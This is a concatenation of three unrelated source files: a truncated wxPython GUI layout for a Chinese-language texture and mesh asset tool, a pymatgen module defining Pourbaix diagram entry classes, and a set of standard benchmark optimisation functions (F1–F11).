sbSizer_load_mesh.Add( self.m_gauge_mesh_load, 1, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_CENTER_HORIZONTAL, 5 )
self.m_staticline12 = wx.StaticLine( sbSizer_load_mesh.GetStaticBox(), wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LI_VERTICAL )
sbSizer_load_mesh.Add( self.m_staticline12, 0, wx.EXPAND |wx.ALL, 5 )
self.m_staticText_mesh_load = wx.StaticText( sbSizer_load_mesh.GetStaticBox(), wx.ID_ANY, u"无任务", wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_staticText_mesh_load.Wrap( -1 )
sbSizer_load_mesh.Add( self.m_staticText_mesh_load, 1, wx.ALL|wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL, 5 )
bSizer15.Add( sbSizer_load_mesh, 0, wx.EXPAND, 5 )
sbSizer_load_tex = wx.StaticBoxSizer( wx.StaticBox( self.m_panel12, wx.ID_ANY, u"Texture2D" ), wx.HORIZONTAL )
self.m_gauge_tex_load = wx.Gauge( sbSizer_load_tex.GetStaticBox(), wx.ID_ANY, 100, wx.DefaultPosition, wx.DefaultSize, wx.GA_HORIZONTAL )
self.m_gauge_tex_load.SetValue( 0 )
sbSizer_load_tex.Add( self.m_gauge_tex_load, 1, wx.ALL|wx.ALIGN_CENTER_VERTICAL, 5 )
self.m_staticline14 = wx.StaticLine( sbSizer_load_tex.GetStaticBox(), wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LI_VERTICAL )
sbSizer_load_tex.Add( self.m_staticline14, 0, wx.EXPAND |wx.ALL, 5 )
self.m_staticText_load_tex = wx.StaticText( sbSizer_load_tex.GetStaticBox(), wx.ID_ANY, u"无任务", wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_staticText_load_tex.Wrap( -1 )
sbSizer_load_tex.Add( self.m_staticText_load_tex, 1, wx.ALL|wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL, 5 )
bSizer15.Add( sbSizer_load_tex, 0, wx.EXPAND, 5 )
self.m_listbook_in = wx.Listbook( self.m_panel12, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LB_DEFAULT )
self.m_panel2 = wx.Panel( self.m_listbook_in, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
bSizer7 = wx.BoxSizer( wx.VERTICAL )
bSizer56 = wx.BoxSizer( wx.HORIZONTAL )
self.m_searchCtrl_tex = wx.SearchCtrl( self.m_panel2, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_searchCtrl_tex.ShowSearchButton( True )
self.m_searchCtrl_tex.ShowCancelButton( True )
bSizer56.Add( self.m_searchCtrl_tex, 1, wx.ALL|wx.EXPAND, 5 )
self.m_staticline16 = wx.StaticLine( self.m_panel2, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LI_HORIZONTAL|wx.LI_VERTICAL )
bSizer56.Add( self.m_staticline16, 0, wx.EXPAND |wx.ALL, 5 )
m_choice11Choices = [ u"全部", u"有中文名", u"无中文名" ]
self.m_choice11 = wx.Choice( self.m_panel2, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_choice11Choices, 0 )
self.m_choice11.SetSelection( 0 )
bSizer56.Add( self.m_choice11, 0, wx.ALL, 5 )
bSizer7.Add( bSizer56, 0, wx.EXPAND, 5 )
m_listBox_texChoices = []
self.m_listBox_tex = wx.ListBox( self.m_panel2, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_listBox_texChoices, wx.LB_ALWAYS_SB|wx.LB_EXTENDED|wx.LB_HSCROLL )
bSizer7.Add( self.m_listBox_tex, 1, wx.ALL|wx.EXPAND, 5 )
self.m_panel2.SetSizer( bSizer7 )
self.m_panel2.Layout()
bSizer7.Fit( self.m_panel2 )
self.m_listbook_in.AddPage( self.m_panel2, u"Texture\n", True )
self.m_panel1 = wx.Panel( self.m_listbook_in, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
bSizer71 = wx.BoxSizer( wx.VERTICAL )
bSizer57 = wx.BoxSizer( wx.HORIZONTAL )
self.m_searchCtrl_mesh = wx.SearchCtrl( self.m_panel1, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_searchCtrl_mesh.ShowSearchButton( True )
self.m_searchCtrl_mesh.ShowCancelButton( True )
bSizer57.Add( self.m_searchCtrl_mesh, 1, wx.ALL|wx.EXPAND, 5 )
self.m_staticline17 = wx.StaticLine( self.m_panel1, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LI_VERTICAL )
bSizer57.Add( self.m_staticline17, 0, wx.EXPAND |wx.ALL, 5 )
m_choice12Choices = [ u"全部", u"有中文名", u"无中文名" ]
self.m_choice12 = wx.Choice( self.m_panel1, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_choice12Choices, 0 )
self.m_choice12.SetSelection( 0 )
bSizer57.Add( self.m_choice12, 0, wx.ALL, 5 )
bSizer71.Add( bSizer57, 0, wx.EXPAND, 5 )
m_listBox_meshChoices = []
self.m_listBox_mesh = wx.ListBox( self.m_panel1, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_listBox_meshChoices, wx.LB_ALWAYS_SB|wx.LB_EXTENDED|wx.LB_HSCROLL )
bSizer71.Add( self.m_listBox_mesh, 1, wx.ALL|wx.EXPAND, 5 )
self.m_panel1.SetSizer( bSizer71 )
self.m_panel1.Layout()
bSizer71.Fit( self.m_panel1 )
self.m_listbook_in.AddPage( self.m_panel1, u"Mesh", False )
bSizer15.Add( self.m_listbook_in, 1, wx.ALL|wx.EXPAND, 5 )
self.m_panel12.SetSizer( bSizer15 )
self.m_panel12.Layout()
bSizer15.Fit( self.m_panel12 )
bSizer28.Add( self.m_panel12, 1, wx.EXPAND |wx.ALL, 5 )
self.m_staticline11 = wx.StaticLine( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LI_VERTICAL )
bSizer28.Add( self.m_staticline11, 0, wx.EXPAND |wx.ALL, 5 )
bSizer47 = wx.BoxSizer( wx.VERTICAL )
self.m_notebook_info = wx.Notebook( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.NB_FIXEDWIDTH )
self.m_panel24 = wx.Panel( self.m_notebook_info, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
bSizer45 = wx.BoxSizer( wx.VERTICAL )
m_listBox_logChoices = []
self.m_listBox_log = wx.ListBox( self.m_panel24, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_listBox_logChoices, 0 )
bSizer45.Add( self.m_listBox_log, 1, wx.ALL|wx.EXPAND, 5 )
self.m_panel24.SetSizer( bSizer45 )
self.m_panel24.Layout()
bSizer45.Fit( self.m_panel24 )
self.m_notebook_info.AddPage( self.m_panel24, u"日志", True )
self.m_panel10 = wx.Panel( self.m_notebook_info, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
bSizer22 = wx.BoxSizer( wx.VERTICAL )
self.m_bitmap_show = wx.StaticBitmap( self.m_panel10, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.DefaultSize, 0 )
bSizer22.Add( self.m_bitmap_show, 1, wx.ALL|wx.EXPAND, 5 )
self.m_panel10.SetSizer( bSizer22 )
self.m_panel10.Layout()
bSizer22.Fit( self.m_panel10 )
self.m_notebook_info.AddPage( self.m_panel10, u"展示区", False )
self.m_panel25 = wx.Panel( self.m_notebook_info, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
bSizer46 = wx.BoxSizer( wx.VERTICAL )
m_listBox_errorsChoices = []
self.m_listBox_errors = wx.ListBox( self.m_panel25, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_listBox_errorsChoices, 0 )
bSizer46.Add( self.m_listBox_errors, 1, wx.ALL|wx.EXPAND, 5 )
self.m_panel25.SetSizer( bSizer46 )
self.m_panel25.Layout()
bSizer46.Fit( self.m_panel25 )
self.m_notebook_info.AddPage( self.m_panel25, u"错误列表", False )
self.m_panel3 = wx.Panel( self.m_notebook_info, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
bSizer6 = wx.BoxSizer( wx.VERTICAL )
gSizer5 = wx.GridSizer( 0, 2, 0, 0 )
self.m_searchCtrl_pass = wx.SearchCtrl( self.m_panel3, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_searchCtrl_pass.ShowSearchButton( True )
self.m_searchCtrl_pass.ShowCancelButton( False )
gSizer5.Add( self.m_searchCtrl_pass, 0, wx.ALL|wx.EXPAND, 5 )
m_choice_passChoices = [ u"全部", u"航母", u"战列舰", u"驱逐", u"巡洋", u"潜艇", u"其他" ]
self.m_choice_pass = wx.Choice( self.m_panel3, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_choice_passChoices, 0 )
self.m_choice_pass.SetSelection( 0 )
gSizer5.Add( self.m_choice_pass, 0, wx.ALL|wx.ALIGN_RIGHT, 5 )
bSizer6.Add( gSizer5, 0, wx.EXPAND, 5 )
m_listBox_skipChoices = []
self.m_listBox_skip = wx.ListBox( self.m_panel3, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_listBox_skipChoices, 0 )
bSizer6.Add( self.m_listBox_skip, 1, wx.ALL|wx.EXPAND, 5 )
self.m_panel3.SetSizer( bSizer6 )
self.m_panel3.Layout()
bSizer6.Fit( self.m_panel3 )
self.m_notebook_info.AddPage( self.m_panel3, u"跳过文件信息", False )
self.m_panel4 = wx.Panel( self.m_notebook_info, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
bSizer72 = wx.BoxSizer( wx.VERTICAL )
gSizer51 = wx.GridSizer( 0, 2, 0, 0 )
self.m_searchCtrl_unable = wx.SearchCtrl( self.m_panel4, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_searchCtrl_unable.ShowSearchButton( True )
self.m_searchCtrl_unable.ShowCancelButton( False )
gSizer51.Add( self.m_searchCtrl_unable, 0, wx.ALL|wx.EXPAND, 5 )
m_choice_unableChoices = [ u"全部", u"航母", u"战列舰", u"驱逐", u"巡洋", u"潜艇", u"其他" ]
self.m_choice_unable = wx.Choice( self.m_panel4, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_choice_unableChoices, 0 )
self.m_choice_unable.SetSelection( 0 )
gSizer51.Add( self.m_choice_unable, 0, wx.ALL|wx.ALIGN_RIGHT, 5 )
bSizer72.Add( gSizer51, 0, wx.EXPAND, 5 )
m_listBox_unableChoices = []
self.m_listBox_unable = wx.ListBox( self.m_panel4, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_listBox_unableChoices, 0 )
bSizer72.Add( self.m_listBox_unable, 1, wx.ALL|wx.EXPAND, 5 )
self.m_panel4.SetSizer( bSizer72 )
self.m_panel4.Layout()
bSizer72.Fit( self.m_panel4 )
self.m_notebook_info.AddPage( self.m_panel4, u"不符合", False )
bSizer47.Add( self.m_notebook_info, 1, wx.EXPAND |wx.ALL, 5 )
self.m_gauge_all = wx.Gauge( self, wx.ID_ANY, 100, wx.DefaultPosition, wx.DefaultSize, wx.GA_HORIZONTAL )
self.m_gauge_all.SetValue( 0 )
bSizer47.Add( self.m_gauge_all, 0, wx.ALL|wx.EXPAND, 5 )
self.m_staticText_now = wx.StaticText( self, wx.ID_ANY, u"当前:None", wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_staticText_now.Wrap( -1 )
bSizer47.Add( self.m_staticText_now, 0, wx.ALL, 5 )
self.m_staticText_all = wx.StaticText( self, wx.ID_ANY, u"总进度:0%", wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_staticText_all.Wrap( -1 )
bSizer47.Add( self.m_staticText_all, 0, wx.ALL, 5 )
gSizer19 = wx.GridSizer( 0, 3, 0, 0 )
self.m_button_gui = wx.Button( self, wx.ID_ANY, u"教程", wx.DefaultPosition, wx.DefaultSize, 0 )
gSizer19.Add( self.m_button_gui, 0, wx.ALL, 5 )
self.m_button_help = wx.Button( self, wx.ID_ANY, u"帮助", wx.DefaultPosition, wx.DefaultSize, 0 )
gSizer19.Add( self.m_button_help, 0, wx.ALL, 5 )
self.m_button5 = wx.Button( self, wx.ID_ANY, u"设置", wx.DefaultPosition, wx.DefaultSize, 0 )
gSizer19.Add( self.m_button5, 0, wx.ALL|wx.ALIGN_RIGHT, 5 )
bSizer47.Add( gSizer19, 0, wx.ALIGN_RIGHT, 5 )
bSizer28.Add( bSizer47, 1, wx.EXPAND, 5 )
self.SetSizer( bSizer28 )
self.Layout()
self.m_statusBar1 = self.CreateStatusBar( 1, wx.STB_DEFAULT_STYLE|wx.STB_SIZEGRIP, wx.ID_ANY )
self.Centre( wx.BOTH )
# Connect Events
self.Bind( wx.EVT_CLOSE, self.close_press )
self.Bind( wx.EVT_MENU, self.load_tex, id = self.m_menuItem_tex.GetId() )
self.Bind( wx.EVT_MENU, self.load_Mesh, id = self.m_menuItem_mesh.GetId() )
self.Bind( wx.EVT_MENU, self.load_rgb, id = self.m_menuItem_rgb.GetId() )
self.Bind( wx.EVT_MENU, self.load_alpha, id = self.m_menuItem_alpha.GetId() )
self.Bind( wx.EVT_MENU, self.load_tex_and_mesh, id = self.m_menuItem_mix.GetId() )
self.Bind( wx.EVT_MENU, self.load_tex_fold, id = self.m_menuItem_texonly.GetId() )
self.Bind( wx.EVT_MENU, self.load_mesh_fold, id = self.m_menuItem_meshonly.GetId() )
self.Bind( wx.EVT_MENU, self.load_rgb_alpha_fold, id = self.m_menuItem_rgb_a.GetId() )
self.Bind( wx.EVT_MENU, self.load_RGB_fold, id = self.m_menuItem_rgb_f.GetId() )
self.Bind( wx.EVT_MENU, self.load_alpha_fold, id = self.m_menuItem_alpha_f.GetId() )
self.Bind( wx.EVT_MENU, self.exit_press, id = self.m_menuItem_exit.GetId() )
self.Bind( wx.EVT_MENU, self.export_all, id = self.m_menuItem_all.GetId() )
self.Bind( wx.EVT_MENU, self.export_choice, id = self.m_menuItem_choice.GetId() )
self.Bind( wx.EVT_MENU, self.copy_file, id = self.m_menuItem_copy_only.GetId() )
self.Bind( wx.EVT_MENU, self.tex_search_ex, id = self.m_menuItem_tex_search.GetId() )
self.Bind( wx.EVT_MENU, self.mesh_search_ex, id = self.m_menuItem_mesh_search.GetId() )
self.Bind( wx.EVT_MENU, self.unable_search_ex, id = self.m_menuItem_unable_search.GetId() )
self.m_bpButton_quick.Bind( wx.EVT_BUTTON, self.quick_work )
self.m_searchCtrl_tex.Bind( wx.EVT_SEARCHCTRL_SEARCH_BTN, self.search_tex )
self.m_searchCtrl_tex.Bind( wx.EVT_TEXT, self.search_tex )
self.m_listBox_tex.Bind( wx.EVT_LISTBOX, self.tex_choice )
self.m_listBox_tex.Bind( | |
<reponame>jmflorez/pymatgen
#!/usr/bin/env python
"""
Module which defines basic entries for each ion and oxide to compute a
Pourbaix diagram
"""
from __future__ import division
__author__ = "<NAME>"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "0.0"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Development"
__date__ = "December 10, 2012"
import re
import math
from pymatgen.core.periodic_table import Element
from pymatgen.core.structure import Composition
from pymatgen.serializers.json_coders import MSONable
from pymatgen.core.ion import Ion
from pymatgen.phasediagram.entries import PDEntry
PREFAC = 0.0591
class PourbaixEntry(MSONable):
"""
An object encompassing all data relevant to an ion in a pourbaix diagram.
Each bulk solid/ion has a free energy g of the form:
g = g0_ref + 0.0591 log10(conc) - nO mu_H2O + (nH - 2nO) pH
+ phi (-nH + 2nO + q)
"""
def __init__(self, entry, correction=0.0, entry_id=None):
"""
Args:
entry:
An entry object
(ComputedEntry/ComputedStructureEntry/PDEntry/IonEntry)
energy:
Energy of entry
"""
if isinstance(entry, IonEntry):
self._entry = entry
self._conc = 1.0e-6
self._phase_type = "Ion"
self._charge = entry.composition.charge
else:
self._entry = entry
self._conc = 1.0
self._phase_type = "Solid"
self._charge = 0.0
self._npH = None
self._nPhi = None
self._nH2O = None
self._nM = None
self.uncorrected_energy = entry.energy
self.correction = correction
self._calc_coeff_terms()
self._name = self._entry.composition.reduced_formula
if self._phase_type == "Solid":
self._name += "(s)"
try:
self.entry_id = entry.entry_id
except AttributeError:
self.entry_id = entry_id
@property
def _g0(self):
return self.energy
@property
def energy(self):
return self.uncorrected_energy + self.correction
@property
def name(self):
"""
Returns the entry's name
"""
return self._name
def set_name(self, string):
"""
Set name of entry
Args:
string: Input string
"""
self._name = string
@property
def npH(self):
"""
Returns value of npH, the coefficient of pH
"""
return self._npH
@property
def nH2O(self):
"""
Returns coefficient of Mu_H2O
"""
return self._nH2O
@property
def nPhi(self):
"""
Returns nPhi, the coefficient of Phi
"""
return self._nPhi
@property
def g0(self):
"""
Return g0 for the entry. Legacy function.
"""
return self._g0
@property
def conc(self):
"""
Return concentration of the entry. Returns 1 if solid.
"""
return self._conc
@property
def conc_term(self):
"""
Returns the concentration contribution to the free energy.
"""
return self.normalization_factor * PREFAC * math.log10(self._conc)
@property
def phase_type(self):
"""
Returns whether the entry is a solid/ion.
"""
return self._phase_type
def g0_add(self, term):
"""
Add a correction term to g0.
Args:
term:
Correction term to add to g0
"""
self.correction += term
def g0_replace(self, term):
"""
Replace g0 by a different value.
Args:
term:
New value for g0
"""
self.uncorrected_energy = term
self.correction = 0.0
@property
def to_dict(self):
"""
Returns dict which contains Pourbaix Entry data.
Note that the pH, voltage, H2O factors are always calculated when
constructing a PourbaixEntry object.
"""
d = {"@module": self.__class__.__module__,
"@class": self.__class__.__name__}
if isinstance(self._entry, IonEntry):
d["entry type"] = "Ion"
else:
d["entry type"] = "Solid"
d["entry"] = self._entry.to_dict
d["pH factor"] = self._npH
d["voltage factor"] = self._nPhi
d["concentration"] = self._conc
d["H2O factor"] = self._nH2O
d["energy"] = self.energy
d["correction"] = self.correction
d["entry_id"] = self.entry_id
return d
@classmethod
def from_dict(cls, d):
"""
Returns a PourbaixEntry by reading in an Ion
"""
entry_type = d["entry type"]
if entry_type == "Ion":
entry = IonEntry.from_dict(d["entry"])
else:
entry = PDEntry.from_dict(d["entry"])
correction = d["correction"]
entry_id = d["entry_id"]
return PourbaixEntry(entry, correction, entry_id)
def _calc_coeff_terms(self):
"""
Calculates coefficients of pH, V, H2O
"""
nH = 0
nO = 0
nM = 0
for elt in self._entry.composition.elements:
if elt == (Element("H")):
nH = self.entry.composition[elt]
elif elt == (Element("O")):
nO = self.entry.composition[elt]
else:
nM += self.entry.composition[elt]
self._nM = nM
self._npH = (nH - 2 * nO)
self._nH2O = nO
self._nPhi = (nH - 2 * nO - self._charge)
@property
def normalization_factor(self):
"""
Normalize each entry by nM
"""
fact = 1.0 / self._nM
return fact
def scale(self, factor):
"""
Normalize all entries by normalization factor.
Args:
factor:
Normalization factor
"""
self._npH *= factor
self._nPhi *= factor
self._nH2O *= factor
self.uncorrected_energy *= factor
self.correction *= factor
# self._g0 *= factor
def normalize(self, factor):
self.scale(factor)
@property
def charge(self):
"""
Returns charge of entry
"""
return self._charge
@property
def composition(self):
"""
Returns composition
"""
return self.entry.composition
@property
def entry(self):
"""
Returns IonEntry/PDEntry object
"""
return self._entry
def reduced_entry(self):
"""
Calculate reduction factor for composition, and reduce parameters by
this factor.
"""
reduction_factor = self.entry.composition.\
get_reduced_composition_and_factor()[1]
self._nM /= reduction_factor
self.scale(1.0 / reduction_factor)
@property
def num_atoms(self):
"""
Return number of atoms in current formula. Useful for normalization
"""
return self.entry.composition.num_atoms\
/ self.entry.composition.get_reduced_composition_and_factor()[1]
def set_conc(self, conc):
"""
Set concentration manually.
Args:
conc:
Input concentration
"""
self._conc = conc
def __repr__(self):
return "Pourbaix Entry : {} with energy = {:.4f}, npH = {}, nPhi = {},\
nH2O = {}".format(self._entry.composition, self.g0, self.npH,
self.nPhi, self.nH2O)
def __str__(self):
return self.__repr__()
class MultiEntry(PourbaixEntry):
"""
PourbaixEntry-like object for constructing multi-elemental Pourbaix
diagrams.
"""
def __init__(self, entry_list, weights=None):
"""
Args:
entry_list:
List of component PourbaixEntries
weights:
Weights associated with each entry. Default is None
"""
if weights is None:
self._weights = [1.0] * len(entry_list)
else:
self._weights = weights
self._entrylist = entry_list
self.correction = 0.0
self.uncorrected_energy = 0.0
self._npH = 0.0
self._nPhi = 0.0
self._nH2O = 0.0
self._nM = 0.0
self._name = ""
self.entry_id = list()
for i in xrange(len(entry_list)):
entry = entry_list[i]
self.uncorrected_energy += self._weights[i] * \
entry.uncorrected_energy
self.correction += self._weights[i] * entry.correction
self._npH += self._weights[i] * entry.npH
self._nPhi += self._weights[i] * entry.nPhi
self._nH2O += self._weights[i] * entry.nH2O
self._nM += self._weights[i] * entry._nM
self._name += entry.name + " + "
self.entry_id.append(entry.entry_id)
self._name = self._name[:-3]
@property
def normalization_factor(self):
"""
Normalize each entry by nM
"""
norm_fac = 0.0
for i in xrange(len(self._entrylist)):
entry = self._entrylist[i]
for el in entry.composition.elements:
if (el == Element("O")) | (el == Element("H")):
continue
if entry._phase_type == 'Solid':
red_fac = entry.composition.\
get_reduced_composition_and_factor()[1]
else:
red_fac = 1.0
norm_fac += self._weights[i] * entry.composition[el] / red_fac
fact = 1.0 / norm_fac
return fact
def __repr__(self):
str = "Multiple Pourbaix Entry : with energy = {:.4f}, npH = {}, "\
"nPhi = {}, nH2O = {}".format(
self.g0, self.npH, self.nPhi, self.nH2O)
str += ", species: "
for entry in self._entrylist:
str += entry.name + " + "
return str[:-3]
def __str__(self):
return self.__repr__()
@property
def conc_term(self):
sum_conc = 0.0
for i in xrange(len(self._entrylist)):
entry = self._entrylist[i]
sum_conc += self._weights[i] * PREFAC * math.log10(entry.conc)
return sum_conc * self.normalization_factor
@property
def entrylist(self):
return self._entrylist
class IonEntry(PDEntry):
"""
Object similar to PDEntry, but contains an Ion object instead of a
Composition object.
.. attribute:: name
A name for the entry. This is the string shown in the phase diagrams.
By default, this is the reduced formula for the composition, but can be
set to some other string for display purposes.
"""
def __init__(self, ion, energy, name=None):
"""
Args:
comp:
Ion object
energy:
Energy for composition.
name:
Optional parameter to name the entry. Defaults to the
chemical formula.
"""
self._energy = energy
self._composition = ion
self.name = name if name else self._composition.reduced_formula
@classmethod
def from_dict(cls, d):
"""
Returns an IonEntry object from a dict.
"""
return IonEntry(Ion.from_dict(d["composition"]), d["energy"])
@property
def to_dict(self):
"""
Creates a dict of composition, energy, and ion name
"""
d = {"composition": self._composition.to_dict, "energy": self._energy}
return d
@property
def energy(self):
"""
Return final energy
"""
return self._energy
@property
def energy_per_atom(self):
"""
Return final energy per atom
"""
return self._energy / self.composition.num_atoms
@property
def composition(self):
"""
Returns the composition
"""
return self._composition
def __repr__(self):
return "IonEntry : {} with energy = {:.4f}".format(self.composition,
self.energy)
def __str__(self):
return self.__repr__()
class PourbaixEntryIO(object):
"""
Class to import and export Pourbaix entries from a csv file
"""
@staticmethod
def to_csv(filename, entries, latexify_names=False):
"""
Exports Pourbaix entries to a csv
Args:
filename:
Filename to write to.
entries:
Entries to export.
latexify_names:
Format entry names to be LaTex compatible, e.g., Li_{2}O
"""
import csv
elements = set()
map(elements.update, [entry.entry.composition.elements
for entry in entries])
elements = sorted(list(elements), key=lambda a: a.X)
writer = csv.writer(open(filename, "wb"), delimiter=",",
quotechar="\"", quoting=csv.QUOTE_MINIMAL)
writer.writerow(["Name"] + elements + ["Energy"] + ["Entry Type"]
+ ["Charge"] + ["Concentration"])
for entry in entries:
row = [entry.name if not latexify_names
else re.sub(r"([0-9]+)", r"_{\1}", entry.name)]
if entry.phase_type == "Solid":
reduction_fac = entry.entry.composition.\
get_reduced_composition_and_factor()[1]
else:
reduction_fac = 1.0
row.extend([entry.entry.composition[el] / reduction_fac
for el in elements])
if entry.phase_type == | |
<gh_stars>1-10
import numpy as np
import math
def prod(it):
p = 1
for n in it:
p *= n
return p
def Ufun(x, a, k, m):
y = k * ((x - a) ** m) * (x > a) + k * ((-x - a) ** m) * (x < (-a))
return y
class F1:
def __init__(self, num_dimensions):
self.dimensions = num_dimensions
self.low = -100
self.high = 100
self.global_optimum_solution = 0
def get_func_val(self, x):
s = np.sum(x ** 2)
return s
def get_search_range(self):
lows = np.asarray([self.low for i in range(self.dimensions)])
highs = np.asarray([self.high for i in range(self.dimensions)])
arrs = [highs, lows]
return np.asarray(arrs)
def get_global_optimum_solution(self):
return self.global_optimum_solution
def get_dimensions(self):
return self.dimensions
class F2:
def __init__(self, num_dimensions):
self.dimensions = num_dimensions
self.low = -10
self.high = 10
self.global_optimum_solution = 0
def get_func_val(self, x):
o = sum(abs(x)) + prod(abs(x))
return o
def get_search_range(self):
lows = np.asarray([self.low for i in range(self.dimensions)])
highs = np.asarray([self.high for i in range(self.dimensions)])
arrs = [highs, lows]
return np.asarray(arrs)
def get_global_optimum_solution(self):
return self.global_optimum_solution
def get_dimensions(self):
return self.dimensions
class F3:
def __init__(self, num_dimensions):
self.dimensions = num_dimensions
self.low = -100
self.high = 100
self.global_optimum_solution = 0
def get_func_val(self, x):
dim = len(x) + 1
o = 0
for i in range(1, dim):
o = o + (np.sum(x[0:i])) ** 2
return o
def get_search_range(self):
lows = np.asarray([self.low for i in range(self.dimensions)])
highs = np.asarray([self.high for i in range(self.dimensions)])
arrs = [highs, lows]
return np.asarray(arrs)
def get_global_optimum_solution(self):
return self.global_optimum_solution
def get_dimensions(self):
return self.dimensions
class F4:
def __init__(self, num_dimensions):
self.dimensions = num_dimensions
self.low = -100
self.high = 100
self.global_optimum_solution = 0
def get_func_val(self, x):
o = max(abs(x))
return o
def get_search_range(self):
lows = np.asarray([self.low for i in range(self.dimensions)])
highs = np.asarray([self.high for i in range(self.dimensions)])
arrs = [highs, lows]
return np.asarray(arrs)
def get_global_optimum_solution(self):
return self.global_optimum_solution
def get_dimensions(self):
return self.dimensions
class F5:
def __init__(self, num_dimensions):
self.dimensions = num_dimensions
self.low = -30
self.high = 30
self.global_optimum_solution = 0
def get_func_val(self, x):
dim = len(x)
o = np.sum(
100 * (x[1:dim] - (x[0 : dim - 1] ** 2)) ** 2 + (x[0 : dim - 1] - 1) ** 2
)
return o
def get_search_range(self):
lows = np.asarray([self.low for i in range(self.dimensions)])
highs = np.asarray([self.high for i in range(self.dimensions)])
arrs = [highs, lows]
return np.asarray(arrs)
def get_global_optimum_solution(self):
return self.global_optimum_solution
def get_dimensions(self):
return self.dimensions
class F6:
def __init__(self, num_dimensions):
self.dimensions = num_dimensions
self.low = -100
self.high = 100
self.global_optimum_solution = 0
def get_func_val(self, x):
o = np.sum(abs((x + 0.5)) ** 2)
return o
def get_search_range(self):
lows = np.asarray([self.low for i in range(self.dimensions)])
highs = np.asarray([self.high for i in range(self.dimensions)])
arrs = [highs, lows]
return np.asarray(arrs)
def get_global_optimum_solution(self):
return self.global_optimum_solution
def get_dimensions(self):
return self.dimensions
class F7:
def __init__(self, num_dimensions):
self.dimensions = num_dimensions
self.low = -1.28
self.high = 1.28
self.global_optimum_solution = 0
def get_func_val(self, x):
dim = len(x)
w = [i for i in range(len(x))]
for i in range(0, dim):
w[i] = i + 1
o = np.sum(w * (x ** 4)) + np.random.uniform(0, 1)
return o
def get_search_range(self):
lows = np.asarray([self.low for i in range(self.dimensions)])
highs = np.asarray([self.high for i in range(self.dimensions)])
arrs = [highs, lows]
return np.asarray(arrs)
def get_global_optimum_solution(self):
return self.global_optimum_solution
def get_dimensions(self):
return self.dimensions
class F8:
def __init__(self, num_dimensions):
self.dimensions = num_dimensions
self.low = -500
self.high = 500
self.global_optimum_solution = -12569.5
def get_func_val(self, x):
o = sum(-x * (np.sin(np.sqrt(abs(x)))))
return o
def get_search_range(self):
lows = np.asarray([self.low for i in range(self.dimensions)])
highs = np.asarray([self.high for i in range(self.dimensions)])
arrs = [highs, lows]
return np.asarray(arrs)
def get_global_optimum_solution(self):
return self.global_optimum_solution
def get_dimensions(self):
return self.dimensions
class F9:
def __init__(self, num_dimensions):
self.dimensions = num_dimensions
self.low = -5.12
self.high = 5.12
self.global_optimum_solution = 0
def get_func_val(self, x):
dim = len(x)
o = np.sum(x ** 2 - 10 * np.cos(2 * math.pi * x)) + 10 * dim
return o
def get_search_range(self):
lows = np.asarray([self.low for i in range(self.dimensions)])
highs = np.asarray([self.high for i in range(self.dimensions)])
arrs = [highs, lows]
return np.asarray(arrs)
def get_global_optimum_solution(self):
return self.global_optimum_solution
def get_dimensions(self):
return self.dimensions
class F10:
def __init__(self, num_dimensions):
self.dimensions = num_dimensions
self.low = -32
self.high = 32
self.global_optimum_solution = 0
def get_func_val(self, x):
dim = len(x)
o = (
-20 * np.exp(-0.2 * np.sqrt(np.sum(x ** 2) / dim))
- np.exp(np.sum(np.cos(2 * math.pi * x)) / dim)
+ 20
+ np.exp(1)
)
return o
def get_search_range(self):
lows = np.asarray([self.low for i in range(self.dimensions)])
highs = np.asarray([self.high for i in range(self.dimensions)])
arrs = [highs, lows]
return np.asarray(arrs)
def get_global_optimum_solution(self):
return self.global_optimum_solution
def get_dimensions(self):
return self.dimensions
class F11:
def __init__(self, num_dimensions):
self.dimensions = num_dimensions
self.low = -600
self.high = 600
self.global_optimum_solution = 0
def get_func_val(self, x):
w = [i for i in range(len(x))]
w = [i + 1 for i in w]
o = np.sum(x ** 2) / 4000 - prod(np.cos(x / np.sqrt(w))) + 1
return o
def get_search_range(self):
